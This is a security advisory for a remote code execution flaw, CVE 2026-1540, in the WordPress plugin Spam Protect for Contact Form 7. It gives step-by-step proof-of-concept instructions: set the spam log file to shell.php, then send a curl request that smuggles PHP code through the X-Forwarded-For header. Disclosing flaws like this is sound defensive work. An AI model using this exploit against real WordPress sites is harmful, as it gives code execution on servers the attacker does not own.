Spam Protect for Contact Form 7 < 1.2.10 – Editor+ Remote Code Execution | CVE 2026-1540

Description

The plugin allows logging to a PHP file, which could allow an attacker with editor access to achieve Remote Code Execution by using a crafted header

Proof of Concept

Detailed: https://gist.github.com/stevenyu113228/d66ce3cec189e043ec417436b8dc3038

1. Add/edit a Contact Form (note the Post ID for the form)
2. Go to "Antispam Settings"
3. Add "testspam" to the words to block. 
4. For the log set the log filename as `shell.php`.

Run the following curl command:

```
curl -s -X POST "http://example.com/wp-json/contact-form-7/v1/contact-forms/[FORM_ID]/feedback" \
  -H $'X-Forwarded-For: <?=phpinfo()?>' \
  -F "your-name=test" \
  -F "your-email=test@test.com" \
  -F "your-subject=test" \
  -F "your-message=testspam" \
  -F "_wpcf7=[FORM_ID]" \
  -F "_wpcf7_version=6.1.4" \
  -F "_wpcf7_locale=en_US" \
  -F "_wpcf7_unit_tag=wpcf7-f[FORM_ID]-p1-o1" \
  -F "_wpcf7_container_post=1"
```

Visit http://example.com/wp-content/shell.php and see the output of `phpinfo()`